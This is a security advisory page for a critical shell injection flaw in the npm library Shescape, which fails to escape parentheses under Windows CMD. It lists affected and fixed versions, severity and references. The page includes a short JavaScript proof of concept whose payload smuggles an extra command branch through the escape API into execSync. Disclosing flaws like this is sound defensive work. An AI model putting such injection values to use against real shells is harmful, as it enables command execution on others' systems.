Advisory Database
  • Advisories
  • Dependency Scanning
  1. npm
  2. ›
  3. shescape
  4. ›
  5. GHSA-w4hw-qcx7-56pr

GHSA-w4hw-qcx7-56pr: Shescape: Shell injection via unescaped parentheses on Windows with CMD

July 24, 2026

This impacts users of Shescape on Windows that explicitly configure shell to CMD, or true with the default shell being CMD, using the escape and escapeAll APIs.

An attacker may be able to achieve shell injection depending on the original command.

import * as cp from "node:child_process";
import { Shescape } from "shescape";

// 1. Prerequisites
const options = {
shell: "cmd.exe",
// Or
shell: true, // Only if the default shell is CMD
};

// 2. Payload
const payload = "x) else if a==a (echo y";

// 3. Usage
const shescape = new Shescape(options);
let escapedPayload;

escapedPayload = shescape.escape(payload);
// Or
escapedPayload = shescape.escapeAll([payload]);

// And (example)
const result = cp.execSync(`if defined FALSY (echo ${escapedPayload})`, options);

// 4. Impact
console.log(result.toString());
// Outputs "y" instead of ""

References

  • github.com/advisories/GHSA-w4hw-qcx7-56pr
  • github.com/ericcornelissen/shescape/blob/dea8893a5877893d8d4923dbf253080e08899e6d/docs/migration.md
  • github.com/ericcornelissen/shescape/commit/43d70b59d09bbe5c3fd02ef08b3a123e977ed9de
  • github.com/ericcornelissen/shescape/commit/b4b34c394e7f9da2775bb75381066b9a228c425f
  • github.com/ericcornelissen/shescape/pull/2649
  • github.com/ericcornelissen/shescape/pull/2651
  • github.com/ericcornelissen/shescape/releases/tag/v2.1.14
  • github.com/ericcornelissen/shescape/releases/tag/v3.0.1
  • github.com/ericcornelissen/shescape/security/advisories/GHSA-w4hw-qcx7-56pr

Code Behaviors & Features

Detect and mitigate GHSA-w4hw-qcx7-56pr with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →

Affected versions

All versions before 2.1.14, all versions starting from 3.0.0 before 3.0.1

Fixed versions

  • 2.1.14
  • 3.0.1

Solution

Upgrade to versions 2.1.14, 3.0.1 or above.

Impact 9.8 CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS

Weakness

  • CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences
  • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Source file

npm/shescape/GHSA-w4hw-qcx7-56pr.yml

Spotted a mistake? Edit the file on GitLab.

  • Site Repo
  • About GitLab
  • Terms
  • Privacy Statement
  • Contact

Page generated Sat, 08 Aug 2026 00:19:10 +0000.